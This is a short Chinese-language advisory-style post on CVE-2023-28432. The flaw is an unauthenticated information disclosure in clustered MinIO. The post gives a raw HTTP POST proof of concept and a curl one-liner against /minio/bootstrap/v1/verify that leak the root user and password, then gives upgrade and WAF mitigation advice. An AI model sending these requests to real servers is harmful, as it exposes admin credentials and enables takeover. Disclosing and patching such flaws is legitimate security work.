在集群部署的 MinIO 中,未经身份认证的远程攻击者通过发送特殊 HTTP请求即可获取所有环境变量,其中包括 MINIO_SECRET_KEY 和 MINIO_ROOT_PASSWORD,造成敏感信息泄露,最终可能导致攻击者以管理员身份登录 MinIO。 漏洞标签:涉及重点系统 漏洞编号:CVE-2023-28432 漏洞类型:信息泄露 受影响版本:
- RELEASE.2019-12-17T23-16-33Z <= MinIO < RELEASE.2023-03-20T20-16-18Z
利用方法:
访问并抓包http://xxx.com/minio/bootstrap/v1/verify可获取 泄露的MINIO_ROOT_USER 和MINIO_ROOT_PASSWORD 值 ,并可直接登陆系统 poc
POST /minio/bootstrap/v1/verify HTTP/1.1
Host: 192.168.69.81:9000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
可以使用curl
curl -XPOST http://192.168.186.148:9003/minio/bootstrap/v1/verify
修复建议
目前官方已发布安全修复版本,受影响用户可以升级到RELEASE.2023-03-20T20-16-18Z 及以上版本。 https://github.com/minio/minio/releases/tag/RELEASE.2023-03-20T20-16-18Z 临时修复方案,在 waf/ips 等安全产品上配置策略,拒绝所有 post 到/minio/bootstrap/v1/verify 流量。
Comments NOTHING